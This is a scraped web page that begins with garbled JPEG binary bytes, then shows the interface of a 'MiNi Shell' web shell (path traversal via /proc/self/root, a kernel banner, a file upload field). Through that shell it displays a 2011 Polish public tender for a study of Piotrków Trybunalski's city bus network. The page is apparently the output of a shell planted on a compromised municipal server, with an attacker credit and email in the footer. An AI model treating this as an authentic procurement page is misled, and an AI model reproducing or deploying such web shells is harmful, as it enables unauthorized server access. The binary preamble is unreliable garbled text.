JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110215/22346-N-2011.html

<p class="kh_header"><b>Piotrków Trybunalski: SPORZĄDZENIE OPRACOWANIA: OCENA EKSPLOATACYJNA SIECI KOMUNIKACJI MIEJSKIEJ W PIOTRKOWIE TRYBUNALSKIM NA PODSTAWIE ANALIZY SYTUACJI RYNKOWEJ WRAZ Z PROPOZYCJĄ ZMIAN W OFERCIE PRZEWOZOWEJ W SEGMENCIE USŁUG REALIZOWANYCH PRZEZ MIEJSKI ZAKŁAD KOMUNIKACYJNY SP. Z O.O.</b><br>
<b>Numer ogłoszenia: 22346 - 2011; data zamieszczenia: 15.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Dróg i Komunikacji , ul. Belzacka 176, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 044 7339252, faks 044 7329253.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzdik.piotrkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SPORZĄDZENIE OPRACOWANIA: OCENA EKSPLOATACYJNA SIECI KOMUNIKACJI MIEJSKIEJ W PIOTRKOWIE TRYBUNALSKIM NA PODSTAWIE ANALIZY SYTUACJI RYNKOWEJ WRAZ Z PROPOZYCJĄ ZMIAN W OFERCIE PRZEWOZOWEJ W SEGMENCIE USŁUG REALIZOWANYCH PRZEZ MIEJSKI ZAKŁAD KOMUNIKACYJNY SP. Z O.O..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Do obowiązków wykonawcy w ramach realizacji zamówienia należeć będzie wykonanie następujących prac i dokumentów:
1)	zaprojektowanie specjalistycznych badań marketingowych wielkości popytu na usługi piotrkowskiej komunikacji miejskiej w segmencie linii Miejskiego Zakładu Komunikacyjnego Sp. z o.o. oraz przewoźników prywatnych - obejmujące:
a)	przygotowanie instrumentów pomiarowych - kart obserwacji zapełnienia odrębnych dla każdej z linii, według wzoru stanowiącego Załącznik Nr 1 do opisu przedmiotu zamówienia;
b)	przygotowanie instrukcji dla uczestników badań;
c)	przygotowanie harmonogramów badań - ogólnych, określających liczbę niezbędnych do zaangażowania osób w każdym dniu badań oraz szczegółowych - stanowiących plan pracy dla każdego uczestnika badań;
d)	przygotowanie identyfikatorów dla uczestników badań;
2)	dobranie i zatrudnienie odpowiednich uczestników badań marketingowych - grupy osób, której zadaniem będzie ustalenie liczby pasażerów wsiadających, wysiadających i pozostających w pojeździe po ruszeniu z każdego przystanku, rejestracja rzeczywistych czasów przejazdu poszczególnych tras; badania obejmą wszystkie kursy w dniu powszednim, w sobotę i w niedzielę;
3)	przeszkolenie uczestników badań marketingowych, obejmujące część teoretyczną (omówienie instrukcji i sposobu wypełniania instrumentów pomiarowych) oraz praktyczną - w autobusach;
4)	dowóz uczestników badań do miejsc rozpoczynania się poszczególnych kursów i ich odwiezienie po zakończeniu pracy;
5)	nadzór merytoryczny nad prawidłowością pracy uczestników badań marketingowych;
6)	przetworzenie danych z przeprowadzonych badań marketingowych, dotyczących wielkości popytu i obejmujące:
a)	wpisanie danych z kart obserwacji do elektronicznych arkuszy kalkulacyjnych;
b)	sporządzenie zestawień wielkości popytu na usługi piotrkowskiej komunikacji miejskiej, w postaci tabel z liczbą pasażerów na każdym z przystanków 
w poszczególnych kursach i liniach, osobno dla dnia powszedniego, soboty, niedzieli;
c)	sporządzenie tabel zawierających liczbę pasażerów ogółem i w przeliczeniu na 
1 wozokilometr - w przekroju poszczególnych kursów oraz zestawionych par kursów tam i z powrotem, z wyszczególnieniem maksymalnego napełnienie (przystanku 
i liczby osób), długości kursu w kilometrach oraz liczbę pasażerów w przeliczeniu na kilometr;
d)	sporządzenie tabel zawierających liczbę wykonywanych na poszczególnych liniach wozokilometrów z rozbiciem na dzień powszedni, sobotę i niedzielę 
i określających ich udział w przewozach pod względem przewożonej liczby pasażerów oraz wykonywanych wozokilometrów;
e)	sporządzenie zestawień prezentujących liczbę pasażerów poszczególnych linii 
w latach 2004, 2008 i 2011 osobno dla dnia powszedniego, soboty oraz niedzieli;
f)	sporządzenie tabeli prezentującej liczbę wykonywanych wozokilometrów 
i wykorzystanie pojazdów na poszczególnych liniach dla dnia powszedniego, soboty 
i niedzieli w latach 2004, 2008 i 2011. 
7)	wykonanie opracowania pt. Ocena eksploatacyjna sieci komunikacji miejskiej 
w Piotrkowie Trybunalskim na podstawie analizy sytuacji rynkowej wraz z propozycją zmian w ofercie przewozowej w segmencie usług realizowanych przez Miejski Zakład Komunikacyjny Sp. z o.o., które musi zawierać:
a)	przedstawienie i ocenę przez pryzmat podaży świadczonych usług oferty przewozowej piotrkowskiej komunikacji miejskiej;
b)	szczegółową analizę wielkości popytu na usługi piotrkowskiej komunikacji miejskiej, w tym: 
a)	określenie wielkości popytu w dniu powszednim, sobotę, niedzielę oraz 
w przeciętnym miesiącu na poszczególnych liniach;
b)	określenie udziału w rynku poszczególnych linii, liczbę pasażerów ogółem 
i w przeliczeniu na 1 wozokilometr dla poszczególnych linii (kursów);
c)	wykorzystanie zdolności przewozowej na poszczególnych liniach 
(w poszczególnych kursach);
d)	wielkość przewozów ogółem, w przeliczeniu na 1 wozokilometr oraz pracę przewozową na poszczególnych liniach w przeciętnym miesiącu;
e)	udział w przewozach poszczególnych linii komunikacji miejskiej;
f)	określenie możliwości eksploatacji taboru o zróżnicowanej pojemności 
w poszczególnych kursach i na określonych liniach komunikacyjnych;
g)	określenie pór doby charakteryzujących się największymi oraz najmniejszymi przewozami mierzonymi liczbą przewożonych pasażerów w dniu powszednim, sobotę oraz niedzielę;
h)	zestawienie opisanych w tej części opracowania parametrów z ich wartościami 
w latach 2004 i 2008;
c)	koncepcję propozycji zmian w ofercie przewozowej Miejskiego Zakładu Komunikacyjnego Sp. z o.o., opartą na wynikach badań marketingowych zawierającą: 
a)	propozycję ewentualnych korekty tras linii obsługiwanych przez Miejski Zakład Komunikacyjny Sp. z o.o.;
b)	standardy kursowania autobusów na poszczególnych liniach, przy przyjęciu zasady modułowego jej kształtowania;
c)	wyliczenie planowanego zaangażowania taboru do obsługi linii w wyodrębnionych przedziałach czasowych.
Badaniami marketingowymi objęte zostaną wszystkie linie komunikacyjne na całej ich długości:
linie Miejskiego Zakładu Komunikacyjnego Sp. z o.o. (linie 0, 1, 2, 4, 5, 6, 7, 8, 9, 10),
linie przewoźników prywatnych (FMG Pioma - Wolborska, FMG Pioma - Wierzeje, Słowackiego - Rakowska, Słowackiego - Meszcze, Wronia - Roosevelta, FMG Pioma - Zalesicka (Witów), B Świerczowska - Twardosławicka, Gliniana - Wolborska, Wronia - Wierzeje, K Sikorskiego - Roosevelta Szpital, M Dworska - Michałowska, W Słowackiego - Wolborska, Carrefour Wierzeje - Carrefour - Wierzeje (linia bezpłatna).
Badania wielkości popytu należy przeprowadzić w oparciu o rozkłady jazdy obowiązujące w dniu 1 marca 2011 r. W przypadku zmian dotyczących rozkładu jazdy w okresie prowadzenia badań, Zamawiający jest zobowiązany poinformować o nich Wykonawcę z minimum 7 (słownie: siedmio) - dniowym wyprzedzeniem.
Każdy kurs należy zbadać jednokrotnie w wybrany dzień powszedni (z wyłączeniem poniedziałku i piątku), jednokrotnie w wybraną sobotę i jednokrotnie w wybraną niedzielę.
Badania wielkości popytu należy przeprowadzić w okresie od 16.03.2011 do 14.04.2011.
W celu sporządzenia opracowania: Ocena eksploatacyjna sieci komunikacji miejskiej  w Piotrkowie Trybunalskim na podstawie analizy sytuacji rynkowej wraz z propozycją zmian w ofercie przewozowej w segmencie usług realizowanych przez Miejski Zakład Komunikacyjny Sp. z o.o., Miejski Zarząd Dróg i Komunikacji w Piotrkowie Trybunalskim zobowiązuje się do dostarczenia wszelkich materiałów dotyczące aktualnych parametrów eksploatacyjnych i ekonomicznych sieci komunikacji miejskiej, które są w jego posiadaniu.
Obowiązujące rozkłady jazdy zostaną dostarczone Wykonawcy w wersji papierowej w terminie 3 dni od daty podpisania umowy.
Wykonanie całości zamówienia składać się będzie z następujących etapów: 
- etap I obejmujący prace dotyczące zaprojektowania, przeprowadzenia oraz przetworzenia danych z badań marketingowych;
 - etap II obejmujący prace związane z wykonaniem opracowania pt. Ocena eksploatacyjna sieci komunikacji miejskiej w Piotrkowie Trybunalskim na podstawie analizy sytuacji rynkowej wraz z propozycją zmian w ofercie przewozowej w segmencie usług realizowanych przez Miejski Zakład Komunikacyjny Sp. z o.o..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.31.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia wymaganych warunków odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Wykonawcę, zgodnych z niniejszą SIWZ. Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W szczególności wykonawca musi spełniać następujący warunek:
1)Wykonać w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie usługi odpowiadające zakresowi i złożoności porównywalnej z przedmiotem niniejszego zamówienia o wartości co najmniej 50 000,00 zł brutto każda, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że usługi zostały wykonane lub są wykonywane należycie (referencje) - wg załącznika nr 4; 
UWAGA: Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go 
z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

Ocena spełnienia wymaganych warunków odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Wykonawcę, zgodnych z niniejszą SIWZ. Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia wymaganych warunków odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Wykonawcę, zgodnych z niniejszą siwz. Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia wymaganych warunków odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Wykonawcę, zgodnych z niniejszą siwz. Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia  wymaganych  warunków  odbywa  się,  zgodnie  z  regułą: spełnia albo nie spełnia, na  podstawie  dokumentów  załączonych do oferty, przez Wykonawcę, zgodnych z niniejszą  SIWZ.  Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kompletna oferta musi zawierać:
1.	Formularz oferty według wzoru zawartego w specyfikacji istotnych warunków zamówienia wraz z wypełnionym kosztorysem ofertowym- wg załącznika nr 1; 
2.	Stosowne pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej (należy załączyć oryginał lub kserokopię potwierdzoną przez notariusza);
3.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu        o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy      w sprawie niniejszego zamówienia publicznego (należy załączyć oryginał lub kserokopię potwierdzoną przez notariusza);
4.	Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, sporządzone na podstawie wzoru stanowiącego - wg załącznika nr 5;
5.	Oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust 1 oraz ust 2 ustawy Pzp -  wg załącznika nr 2;
6. Oświadczenie wykonawcy o niezaleganiu z opłacaniem podatków oraz opłat i składek na ubezpieczenie zdrowotne i społeczne; wg załącznika nr 3.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zapis o dopuszczalnych zmianach postanowień umowy znajduje się w projekcie umowy dołączonym do siwz.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzdik.piotrkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MIEJSKI ZARZĄD DRÓG I KOMUNIKACJI
ul. BELZACKA  176 
97 - 300 PIOTRKÓW TRYBUNALSKI.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2011 godzina 07:30, miejsce: MIEJSKI ZARZĄD DRÓG I KOMUNIKACJI
ul. BELZACKA  176 POK. NR 2 (SEKRETARIAT)
97 - 300 PIOTRKÓW TRYBUNALSKI.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com